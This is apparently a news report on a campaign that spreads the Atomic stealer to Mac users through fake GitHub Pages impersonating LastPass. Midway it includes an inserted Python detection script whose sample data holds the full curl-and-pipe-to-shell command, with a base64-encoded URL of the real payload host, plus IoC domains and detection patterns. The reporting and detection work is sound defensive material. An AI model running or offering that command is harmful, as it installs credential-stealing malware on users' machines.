Hackers Abuse GitHub Pages to Spread Stealer Malware to macOS Users
A sophisticated malware campaign is targeting Mac users through fraudulent GitHub repositories that masquerade as legitimate software downloads, with threat actors exploiting search engine optimization tactics to deliver malicious links directly to unsuspecting victims.
The LastPass Threat Intelligence, Mitigation, and Escalation team has identified an ongoing widespread infostealer operation that specifically targets macOS users through deceptive GitHub Pages designed to distribute the notorious Atomic stealer malware.
Search Engine Manipulation Drives Traffic to Malicious Sites
The campaign demonstrates advanced social engineering techniques by leveraging SEO poisoning to ensure malicious GitHub repositories appear at the top of search results on major platforms including Google and Bing.
When users search for legitimate software downloads, they encounter what appear to be official company repositories but are in fact elaborate facades created by cybercriminals.
The threat actors have cast a wide net, targeting numerous high-profile organizations across multiple sectors including technology companies, financial institutions, and password management services.
[Image: Example of a phishing email impersonating LastPass to steal user information by urging verification of personal data]
LastPass researchers discovered two fraudulent GitHub sites impersonating their service, both created by the user “modhopmduck476” on September 16th.
These repositories featured convincing headlines incorporating company names and Mac-specific terminology such as “MacOS,” “Mac,” and “Premium on Macbook” to maximize their appeal to target demographics.
The malicious pages included links claiming to offer “Install LastPass on MacBook” that redirected victims to a secondary staging site at “ahoastock825[.]github[.]io/.github/lastpass.”

The attack employs a sophisticated multi-stage delivery mechanism that begins when victims visit the fraudulent GitHub page and are redirected to “macprograms-pro[.]com/mac-git-2-download.html.”
This secondary site instructs users to copy and paste a terminal command that runs curl against a base64-encoded URL.
The encoded URL decodes to “bonoud[.]com/get3/install.sh,” which then downloads a payload disguised as an “Update” file to the system’s temporary directory.
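The one-liner described above (a base64 blob decoded inline, fetched with curl and handed to a shell) is easy to triage from process command-line telemetry or shell history. The following Python script is an added defensive example, not LastPass tooling or anything from the article: it decodes base64 candidates found in each command line, recovers hidden hostnames, and scores the curl-to-decoded-URL, pipe-to-shell, and temp-directory "Update" patterns the article describes. The sample command lines are constructed; the IoC domains are the ones quoted (defanged) in the article, and the regexes and scoring weights are my own assumptions.

```python
"""Triage shell command lines for the curl / base64-URL / pipe-to-shell pattern.

Added defender example (not LastPass's code). Input records are constructed;
the IoC domains are those quoted in the article, normalised from defanged form.
"""
import base64
import binascii
import re
from dataclasses import dataclass

# Domains quoted (defanged) in the article, in matchable form.
IOC_DOMAINS = {"macprograms-pro.com", "bonoud.com", "ahoastock825.github.io"}

# Candidate base64 blobs: 16+ chars of the base64 alphabet plus optional padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Hostname of any http(s) URL found in decoded text.
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# `base64 -d` (GNU / newer macOS) or `base64 -D` (older macOS) decoding inline.
DECODE_RE = re.compile(r"base64\s+(?:-d|--decode|-D)\b")
# Fetched content piped straight into an interpreter.
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
# A file named "Update" written under a temporary directory (assumed heuristic).
TMP_UPDATE_RE = re.compile(r"(?:/tmp/|\$TMPDIR/?|/var/folders/)[^\s]*Update\b")


@dataclass
class Finding:
    command: str
    decoded_hosts: list   # hostnames recovered from base64 blobs
    matched_iocs: list    # article IoC domains seen literally or after decoding
    score: int            # 0 means nothing suspicious was observed


def decode_candidates(command: str) -> list:
    """Return printable UTF-8 strings hidden in base64 blobs within the command."""
    decoded = []
    for blob in B64_RE.findall(command):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # ordinary long tokens (paths, hashes) fail here
        if text.isprintable():
            decoded.append(text)
    return decoded


def triage(command: str) -> Finding:
    """Score one command line; weights are assumptions, not a vendor's rules."""
    hosts = [h for text in decode_candidates(command) for h in URL_RE.findall(text)]
    iocs = sorted({h for h in hosts if h in IOC_DOMAINS}
                  | {d for d in IOC_DOMAINS if d in command})
    score = 0
    if hosts and DECODE_RE.search(command):
        score += 3  # download target deliberately hidden behind base64
    if "curl" in command and PIPE_TO_SHELL_RE.search(command):
        score += 3  # remote content executed without being inspected on disk
    if TMP_UPDATE_RE.search(command):
        score += 2  # payload name and location described in the article
    if iocs:
        score += 5  # direct hit on a known indicator
    return Finding(command, hosts, iocs, score)


def scan(commands) -> list:
    """Return findings with a non-zero score, highest score first."""
    findings = [triage(c) for c in commands]
    return sorted((f for f in findings if f.score > 0),
                  key=lambda f: f.score, reverse=True)


# Constructed sample command lines (e.g. from EDR process events or shell history).
SAMPLE_COMMANDS = [
    # the copy-paste pattern from the article; blob decodes to the quoted IoC URL
    'curl -fsSL "$(echo aHR0cHM6Ly9ib25vdWQuY29tL2dldDMvaW5zdGFsbC5zaA== | base64 -d)" | sh',
    # benign download with a plain URL and no shell execution
    "curl -fsSL https://example.org/tool.tar.gz -o /tmp/tool.tar.gz",
    # base64 used legitimately to encode a local file
    "base64 -i report.pdf -o report.b64",
    # placeholder host, but the temp-directory "Update" drop pattern is present
    "curl -s https://placeholder.invalid/get -o /tmp/Update",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_COMMANDS):
        print(f"score={f.score:<3} iocs={f.matched_iocs} hosts={f.decoded_hosts}")
        print(f"    {f.command}")
```

Run it as-is to see the two suspicious lines ranked; in practice you would feed it command lines from your endpoint telemetry and keep the IoC set current. The base64 regex intentionally requires 16 or more alphabet characters so that short tokens are ignored, and strict decoding (validate=True) discards paths and hashes that merely look like base64.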
[Image: Malware detection report showing multiple security vendors identifying a macOS Trojan dropper, consistent with Atomic stealer analysis]
Security teams across the industry are now actively monitoring for indicators of compromise related to this campaign, with LastPass leading takedown efforts against the fraudulent repositories targeting their customers.
The company has successfully removed the identified malicious sites and continues to pursue disruption activities while sharing threat intelligence with other security organizations to combat this evolving threat landscape.